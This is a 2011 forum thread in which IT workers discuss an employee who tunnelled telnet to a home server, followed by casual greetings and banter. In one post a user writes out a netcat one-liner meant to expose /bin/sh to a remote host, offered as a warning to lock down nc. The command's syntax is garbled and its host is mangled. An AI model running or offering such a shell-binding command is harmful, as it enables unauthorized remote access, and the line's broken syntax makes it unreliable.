User Tag List

  1. Orby's Avatar
    That's kinda funny, because we had a help desk employee (they subcontracted) somehow get telnet access on his desktop and was trying to communicate to one of his home servers. We caught it quick and captured a few packets both ways (to see what he was up to) then started dropping it off the network. He was subsequently fired and they wouldn't let me get his desktop to find out how he got access. Instead they wiped it and set it up again.
    How typical of corporate types... no fun in anything.

    If I had to guess, he probably bound port 22 to something more traditional, like 8080 (since ≤80 is root-only binding traditionally IIRC)... unless he was using the telnet protocol like a boss, and the telnet binary itself is restricted... in which case, I'd vote "hire him on so we can learn how he did that."
    2011-05-21 09:11 AM
  2. A3gOwner's Avatar
    That's what I was thinking because they won't restrict the telnet binary for some god for saken reason. It's been suggested many times over especially with ssh being widely available and adaptable.
    2011-05-21 09:17 AM
  3. Orby's Avatar
    That's what I was thinking because they won't restrict the telnet binary for some god for saken reason. It's been suggested many times over especially with ssh being widely available and adaptable.
    Oh... if SSH isn't locked down tighter than a pirate's hard-won treasure, then y'all have much LARGER problems than telnet.

    Heck, y'all best make sure nc and ifconfig/BIND are chown'ed and chmod'ed correctly. Heck, use the root account to assign them a non-existent UID (if you don't use them). That's two very easy-to-do, very hard-to-find remote privilege escalation entrances right there... "nc 127.0.0.1:/bin/sh [email protected]s:22 -k <pubkey>" and you're sunk.
    2011-05-21 09:24 AM
  4. A3gOwner's Avatar
    No that's the issue ssh is locked down but not telnet. See it's kinda hard to explain but I believe they have to leave telnet to do something with the robots on the assembly lines and other areas of production. Like I said we do most of the Linux/unix systems and the communication to and from our servers. There's a totally different department that deals with the locking down and enforcing policies and such on the network. We just dabble alot (more free time than actual work time if everything running correctly) and try to help other departments out when we can.
    2011-05-21 09:46 AM
  5. Orby's Avatar
    No that's the issue ssh is locked down but not telnet. See it's kinda hard to explain but I believe they have to leave telnet to do something with the robots on the assembly lines and other areas of production. Like I said we do most of the Linux/unix systems and the communication to and from our servers. There's a totally different department that deals with the locking down and enforcing policies and such on the network. We just dabble alot (more free time than actual work time if everything running correctly) and try to help other departments out when we can.
    Oh, okay. So it's a company-wide policy that requires telnet be open for one function, but not another (but they just keep it open on all terminals)?

    Man, bad need-to-know user protocols will screw things up... but I have a feeling I'm preaching to the choir on that one.
    2011-05-21 09:57 AM
  6. 2k1's Avatar
    Good morning all


    Sent from my iPhone using ModMyi
    2011-05-21 02:09 PM
  7. Sanady361's Avatar
    And good morning to you kind sir.
    My latest theme - -
    2011-05-21 02:28 PM
  8. 2k1's Avatar
    And good morning to you kind sir.
    how's it going today?


    Sent from my iPhone using ModMyi
    2011-05-21 02:36 PM
  9. Cowboy's Avatar
    What's up
    2011-05-21 02:38 PM
  10. 2k1's Avatar
    What's up

    what's up cowboy

    Sent from my iPhone using ModMyi
    2011-05-21 03:02 PM
  11. Cowboy's Avatar
    Not much working
    2011-05-21 03:04 PM
  12. Stray's Avatar
    congrats orb sup guys
    2011-05-21 03:26 PM
  13. Cowboy's Avatar
    Not much stray u
    2011-05-21 03:51 PM
  14. Stray's Avatar
    same pretty much watching tv
    2011-05-21 03:53 PM
  15. Cowboy's Avatar
    I working hows that the same as watching tv?
    2011-05-21 03:54 PM
  16. Stray's Avatar
    im watching pwople working on tv
    2011-05-21 03:55 PM
  17. Cowboy's Avatar
    Not the same
    2011-05-21 03:56 PM
  18. Stray's Avatar
    i mean it looks tiring
    2011-05-21 03:58 PM
  19. one1's Avatar


    S
    S
    S
    S
    S

    S S
    S S

    Don't think it's Morse... ellipses to imply boredom perhaps?
    2011-05-21 04:00 PM
  20. Cowboy's Avatar
    Oh ok .............................. fool
    2011-05-21 04:00 PM
LINK TO POST COPIED TO CLIPBOARD